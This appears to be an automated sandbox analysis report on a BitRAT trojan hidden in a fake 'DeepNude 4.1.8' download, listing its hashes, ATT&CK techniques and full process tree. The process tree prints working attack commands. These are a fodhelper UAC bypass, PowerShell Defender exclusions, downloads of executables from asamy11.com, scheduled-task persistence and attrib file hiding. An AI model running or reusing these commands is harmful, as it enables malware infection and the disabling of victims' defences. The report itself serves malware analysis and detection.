bitrat | 7fa23980ef1ca0fe2cda5aedeb20e122c492f644063945dc451aa887262c1caf

General

Target

DeepNude-4.1.8-main/DeepNude 4.1.8/Ba‮nls.scr
Size

59KB
MD5

b242156243e162315223649f74781b47
SHA1

62a05a78cc3e413556427174797b266056228e14
SHA256

293dfd8fc8dbb5c9dae7f693dd7c8af5cc3b534080b75685738188ce4fa16a40
SHA512

a29d16c282c3362cc306ab5adb8031c17e69738aa9cf6c86c4d8503469d44376f76659860b8678383900b9a9aaeeac39ef249b1718e8891e4465ea9f8e8c198c
SSDEEP

384:J7dQrb1epzgNbvFAbBZUC6vZZBfNAAK/Voc+i0UzU1s4gQH7vn:hMbwiNL0ZUzlNAp/Vocb+

Score

10^/10

bitrat evasion trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://asamy11.com/cp.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://asamy11.com/sv.exe

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPRomptBehAvioRAdmin = "0"	reg.exe

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

11 1464 powershell.exe
12 3684 powershell.exe
Downloads MZ/PE file
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

1744 attrib.exe
4040 attrib.exe
4964 attrib.exe
1932 attrib.exe
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2900 schtasks.exe
1920 schtasks.exe
1620 schtasks.exe
1268 schtasks.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

5028 timeout.exe
3672 timeout.exe
4632 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

776 taskkill.exe

flow	pid	process
11	1464	powershell.exe
12	3684	powershell.exe

pid	process
1744	attrib.exe
4040	attrib.exe
4964	attrib.exe
1932	attrib.exe

pid	process
2900	schtasks.exe
1920	schtasks.exe
1620	schtasks.exe
1268	schtasks.exe

pid	process
5028	timeout.exe
3672	timeout.exe
4632	timeout.exe

pid	process
776	taskkill.exe

Modifies registry class 7 IoCs

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\commAnd\ = "C:\\windows\\SYStem32\\cmd.exe /c REG ADD HKLM\\soFtwARE\\micRosoFt\\windows\\cuRREntveRsion\\policies\\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\commAnd	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\commAnd\DelegAteExecute = " "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\commAnd	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

5012 reg.exe

pid	process
5012	reg.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1472	powershell.exe
1472	powershell.exe
1860	powershell.exe
1860	powershell.exe
1464	powershell.exe
1464	powershell.exe
3684	powershell.exe
3684	powershell.exe
1256	powershell.exe
1256	powershell.exe
4112	powershell.exe
4112	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	1256	powershell.exe
Token: SeDebugPrivilege	4112	powershell.exe
Token: SeDebugPrivilege	776	taskkill.exe

Suspicious use of WriteProcessMemory 52 IoCs

Processes:

Ba‮nls.scrcmd.execmd.exefodhelper.execmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4960 wrote to memory of 4084	4960	Ba‮nls.scr	cmd.exe
PID 4960 wrote to memory of 4084	4960	Ba‮nls.scr	cmd.exe
PID 4084 wrote to memory of 4136	4084	cmd.exe	cmd.exe
PID 4084 wrote to memory of 4136	4084	cmd.exe	cmd.exe
PID 4136 wrote to memory of 1304	4136	cmd.exe	reg.exe
PID 4136 wrote to memory of 1304	4136	cmd.exe	reg.exe
PID 4136 wrote to memory of 676	4136	cmd.exe	reg.exe
PID 4136 wrote to memory of 676	4136	cmd.exe	reg.exe
PID 4136 wrote to memory of 3524	4136	cmd.exe	fodhelper.exe
PID 4136 wrote to memory of 3524	4136	cmd.exe	fodhelper.exe
PID 3524 wrote to memory of 1352	3524	fodhelper.exe	cmd.exe
PID 3524 wrote to memory of 1352	3524	fodhelper.exe	cmd.exe
PID 4136 wrote to memory of 5096	4136	cmd.exe	cacls.exe
PID 4136 wrote to memory of 5096	4136	cmd.exe	cacls.exe
PID 1352 wrote to memory of 5012	1352	cmd.exe	reg.exe
PID 1352 wrote to memory of 5012	1352	cmd.exe	reg.exe
PID 4136 wrote to memory of 1472	4136	cmd.exe	powershell.exe
PID 4136 wrote to memory of 1472	4136	cmd.exe	powershell.exe
PID 4136 wrote to memory of 1860	4136	cmd.exe	powershell.exe
PID 4136 wrote to memory of 1860	4136	cmd.exe	powershell.exe
PID 4136 wrote to memory of 5028	4136	cmd.exe	timeout.exe
PID 4136 wrote to memory of 5028	4136	cmd.exe	timeout.exe
PID 4136 wrote to memory of 1464	4136	cmd.exe	powershell.exe
PID 4136 wrote to memory of 1464	4136	cmd.exe	powershell.exe
PID 4136 wrote to memory of 3672	4136	cmd.exe	timeout.exe
PID 4136 wrote to memory of 3672	4136	cmd.exe	timeout.exe
PID 4136 wrote to memory of 3684	4136	cmd.exe	powershell.exe
PID 4136 wrote to memory of 3684	4136	cmd.exe	powershell.exe
PID 4136 wrote to memory of 4632	4136	cmd.exe	timeout.exe
PID 4136 wrote to memory of 4632	4136	cmd.exe	timeout.exe
PID 4136 wrote to memory of 1256	4136	cmd.exe	powershell.exe
PID 4136 wrote to memory of 1256	4136	cmd.exe	powershell.exe
PID 1256 wrote to memory of 2900	1256	powershell.exe	schtasks.exe
PID 1256 wrote to memory of 2900	1256	powershell.exe	schtasks.exe
PID 4136 wrote to memory of 4112	4136	cmd.exe	powershell.exe
PID 4136 wrote to memory of 4112	4136	cmd.exe	powershell.exe
PID 4112 wrote to memory of 1920	4112	powershell.exe	schtasks.exe
PID 4112 wrote to memory of 1920	4112	powershell.exe	schtasks.exe
PID 4136 wrote to memory of 1620	4136	cmd.exe	schtasks.exe
PID 4136 wrote to memory of 1620	4136	cmd.exe	schtasks.exe
PID 4136 wrote to memory of 1268	4136	cmd.exe	schtasks.exe
PID 4136 wrote to memory of 1268	4136	cmd.exe	schtasks.exe
PID 4136 wrote to memory of 1744	4136	cmd.exe	attrib.exe
PID 4136 wrote to memory of 1744	4136	cmd.exe	attrib.exe
PID 4136 wrote to memory of 4040	4136	cmd.exe	attrib.exe
PID 4136 wrote to memory of 4040	4136	cmd.exe	attrib.exe
PID 4136 wrote to memory of 4964	4136	cmd.exe	attrib.exe
PID 4136 wrote to memory of 4964	4136	cmd.exe	attrib.exe
PID 4136 wrote to memory of 1932	4136	cmd.exe	attrib.exe
PID 4136 wrote to memory of 1932	4136	cmd.exe	attrib.exe
PID 4136 wrote to memory of 776	4136	cmd.exe	taskkill.exe
PID 4136 wrote to memory of 776	4136	cmd.exe	taskkill.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

1744 attrib.exe
4040 attrib.exe
4964 attrib.exe
1932 attrib.exe

pid	process
1744	attrib.exe
4040	attrib.exe
4964	attrib.exe
1932	attrib.exe

C:\Users\Admin\AppData\Local\Temp\DeepNude-4.1.8-main\DeepNude 4.1.8\Ba‮nls.scr
"C:\Users\Admin\AppData\Local\Temp\DeepNude-4.1.8-main\DeepNude 4.1.8\Ba‮nls.scr" /S
1⤵
- Suspicious use of WriteProcessMemory
PID:4960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DeepNude-4.1.8-main\DeepNude 4.1.8/Barcs/Nugets/logs.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:4084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\DeepNude-4.1.8-main\DeepNude 4.1.8\Barcs\Nugets\logs.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:4136

C:\Windows\system32\reg.exe
REG ADD "HKCU\SOFTWARE\ClAsses\ms-settings\shell\open\commAnd" /t REG_SZ /d "C:\windows\SYStem32\cmd.exe /c REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F" /F
4⤵
- Modifies registry class
PID:1304

C:\Windows\system32\reg.exe
REG ADD "hkcu\soFtwARE\clAsses\ms-settings\shell\open\commAnd" /v DelegAteExecute /t REG_SZ /d " " /F
4⤵
- Modifies registry class
PID:676

C:\Windows\system32\fodhelper.exe
FodhelpeR.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3524

C:\windows\SYStem32\cmd.exe
"C:\windows\SYStem32\cmd.exe" /c REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F
5⤵
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\system32\reg.exe
REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F
6⤵
- UAC bypass
- Modifies registry key
PID:5012

C:\Windows\SYStem32\cacls.exe
"C:\Windows\SYStem32\cAcls.exe" "C:\Windows\SYStem32\conFig\SYStem"
4⤵
PID:5096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshell.exe -c "ADD-MpPREFeREnce -ExclusionExtension ".exe""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshell.exe -c "ADD-MpPREFeREnce -ExclusionExtension ".dll""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1860

C:\Windows\system32\timeout.exe
timeout /T 1
4⤵
- Delays execution with timeout.exe
PID:5028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://asamy11.com/cp.exe','C:\Users\Admin\file\svchost.exe')
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Windows\system32\timeout.exe
timeout /T 1
4⤵
- Delays execution with timeout.exe
PID:3672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://asamy11.com/sv.exe','C:\Users\Admin\file\f\svchost.exe')
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3684

C:\Windows\system32\timeout.exe
timeout /T 1
4⤵
- Delays execution with timeout.exe
PID:4632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshell.exe -c "Start-Process -FilePath schtasks -ArgumentList '/Create', '/sc ONLOGON', '/tn SystemRestore', '/IT', '/TR', \"C:\Users\Admin\file\svchost.exe\""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1256

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /sc ONLOGON /tn SystemRestore /IT /TR C:\Users\Admin\file\svchost.exe
5⤵
- Creates scheduled task(s)
PID:2900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshell.exe -c "Start-Process -FilePath schtasks -ArgumentList '/Create', '/sc ONLOGON', '/tn SystemRegenerate', '/IT', '/TR', \"C:\Users\Admin\file\f\svchost.exe\""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4112

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /sc ONLOGON /tn SystemRegenerate /IT /TR C:\Users\Admin\file\f\svchost.exe
5⤵
- Creates scheduled task(s)
PID:1920

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 3 /tn "SystemBackup" /tr "C:\Users\Admin\file\f\svchost.exe"
4⤵
- Creates scheduled task(s)
PID:1620

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 2 /tn "SystemRecovery" /tr "C:\Users\Admin\file\svchost.exe"
4⤵
- Creates scheduled task(s)
PID:1268

C:\Windows\system32\attrib.exe
attrib +S +H C:\Users\Admin\file
4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1744

C:\Windows\system32\attrib.exe
attrib +S +H C:\Users\Admin\file\svchost.exe
4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4040

C:\Windows\system32\attrib.exe
attrib +S +H C:\Users\Admin\file\f
4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4964

C:\Windows\system32\attrib.exe
attrib +S +H C:\Users\Admin\file\f\svchost.exe
4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1932

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:776

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Hidden Files and Directories

2

T1158

Scheduled Task

1

T1053

Privilege Escalation

Bypass User Account Control

1

T1088

Scheduled Task

1

T1053

Defense Evasion

Bypass User Account Control

1

T1088

Disabling Security Tools

1

T1089

Modify Registry

2

T1112

Hidden Files and Directories

2

T1158

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
7a451cd1316d70a65910773fee8c3a43

SHA1
d2db32d5037153dd1d94565b51b5b385817a3c3d

SHA256
862d25ed22075f3d1f5e8d29a3c6e050dc91e53a4dc653c3f0f7c627a12ee26c

SHA512
60887f795036fbd6d25234c17dab4463a8a02f576ae8c07dd7b4c4ff1dba35f99b7301139ea051a7a80fdfc9e003a2f0c2dd0d444a82ecf87a3df21507332aa6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3bc487c4f8b717d6f9744ecffaeba1af

SHA1
9a0a6198ae1e2782f109bcb1cb9e86003b6fcfdb

SHA256
1ec5b30fddeee139923b4296b5f7ca549775e5679dac48204a77f4ac5391c0cc

SHA512
552b82ebb19ff6c7f3214b33d31c2f295702a91c699fdd835acc7ce3a4e5bc10bbacde8cf77422d494ea6193d46d78786d3cdd26077d0ab1a98426fd83652dfe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
93f47be3923281bcca20fdc835a85f4a

SHA1
4f542170c3cf56e32f5d7473a59e277a8cbbe305

SHA256
a2a177f1e168171ed86deac452448ca26768c3f3af9dd5d4a1ec4e7d2e7471a0

SHA512
598f9e0d0c4998b08d652ef94d93b6ac8c4181ccce0faac134287b40bb9ca3dd44264ef4f14e13cd2cc23ef3f205eab3140d40bdbf487157d5a02bdd7fe043b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
305a12bb9c823693a21be8eb4cd6764f

SHA1
dcafb24f3356122d647069577755597d7ecddeca

SHA256
b54ce1e64d4bd29a0c1634dec91251428a81f61f52121e73b42fbd8873411718

SHA512
939dea2c3f42b1e09465d26b5e008bd32fd95f4bd15c89ae22369a7cc6c7cfd729e030627d19c4d469280c3aa7024edf57d3b78e08dc4d43d799fb891a92e196

Download Submit
C:\Users\Admin\file\f\svchost.exe
Filesize
9KB

MD5
1d7c371b11e5106c1c74927dc3f7af32

SHA1
a45fdd112ff13933926f0249e04e877819f83bed

SHA256
36e1a3ffea6eb3d08e7d37a7bfc30276f51b315e259dfcc23661572df33141dc

SHA512
707d0eecfefdb6962d30651b1b8595bf56530b7f80aaf54cc4dff727e2dfbc6a19781b492e3b15db9699d5586be38323132535900cfe6ced4c089707f5465c60

Download Submit
C:\Users\Admin\file\svchost.exe
Filesize
3.8MB

MD5
45c8f90c877f80ba045b3dbe894e618c

SHA1
daab90a71238516c0f2b7f0bc304081d5a688b26

SHA256
44aa53ef588c973163b1d312e2920825b5287640f1f9b1447a784f1e2802e6ee

SHA512
daae8bd7bcfeb329f056d76ced7d1cf974194ac757e375f3f5f5982b431828c0e652d3e49700ad876173279a658632e396c9c1d4588c38328bbe2676ae2bdd68

Download Submit
memory/676-137-0x0000000000000000-mapping.dmp

Download
memory/776-179-0x0000000000000000-mapping.dmp

Download
memory/1256-160-0x0000000000000000-mapping.dmp

Download
memory/1256-162-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmp

Filesize
10.8MB

Download
memory/1256-164-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmp

Filesize
10.8MB

Download
memory/1268-172-0x0000000000000000-mapping.dmp

Download
memory/1304-136-0x0000000000000000-mapping.dmp

Download
memory/1352-139-0x0000000000000000-mapping.dmp

Download
memory/1464-153-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmp

Filesize
10.8MB

Download
memory/1464-152-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmp

Filesize
10.8MB

Download
memory/1464-150-0x0000000000000000-mapping.dmp

Download
memory/1472-144-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmp

Filesize
10.8MB

Download
memory/1472-143-0x00000224F0120000-0x00000224F0142000-memory.dmp

Filesize
136KB

Download
memory/1472-142-0x0000000000000000-mapping.dmp

Download
memory/1620-171-0x0000000000000000-mapping.dmp

Download
memory/1744-173-0x0000000000000000-mapping.dmp

Download
memory/1860-145-0x0000000000000000-mapping.dmp

Download
memory/1860-148-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmp

Filesize
10.8MB

Download
memory/1920-168-0x0000000000000000-mapping.dmp

Download
memory/1932-177-0x0000000000000000-mapping.dmp

Download
memory/2900-163-0x0000000000000000-mapping.dmp

Download
memory/3524-138-0x0000000000000000-mapping.dmp

Download
memory/3672-154-0x0000000000000000-mapping.dmp

Download
memory/3684-155-0x0000000000000000-mapping.dmp

Download
memory/3684-158-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmp

Filesize
10.8MB

Download
memory/3684-157-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmp

Filesize
10.8MB

Download
memory/4040-174-0x0000000000000000-mapping.dmp

Download
memory/4084-134-0x0000000000000000-mapping.dmp

Download
memory/4112-165-0x0000000000000000-mapping.dmp

Download
memory/4112-169-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmp

Filesize
10.8MB

Download
memory/4112-170-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmp

Filesize
10.8MB

Download
memory/4136-135-0x0000000000000000-mapping.dmp

Download
memory/4632-159-0x0000000000000000-mapping.dmp

Download
memory/4960-167-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmp

Filesize
10.8MB

Download
memory/4960-132-0x0000000000A10000-0x0000000000A24000-memory.dmp

Filesize
80KB

Download
memory/4960-133-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmp

Filesize
10.8MB

Download
memory/4960-180-0x00007FFA79F20000-0x00007FFA7A9E1000-memory.dmp

Filesize
10.8MB

Download
memory/4964-176-0x0000000000000000-mapping.dmp

Download
memory/5012-141-0x0000000000000000-mapping.dmp

Download
memory/5028-149-0x0000000000000000-mapping.dmp

Download
memory/5096-140-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads